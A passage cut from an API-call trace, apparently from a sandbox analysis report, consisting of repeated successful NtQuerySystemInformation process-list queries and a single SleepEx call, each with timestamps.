ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.158] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0101.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0101.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x159f0) returned 0x0 [0102.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c48) returned 0x0 [0102.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15c08) returned 0x0 [0102.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x15d18) returned 0x0 [0102.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 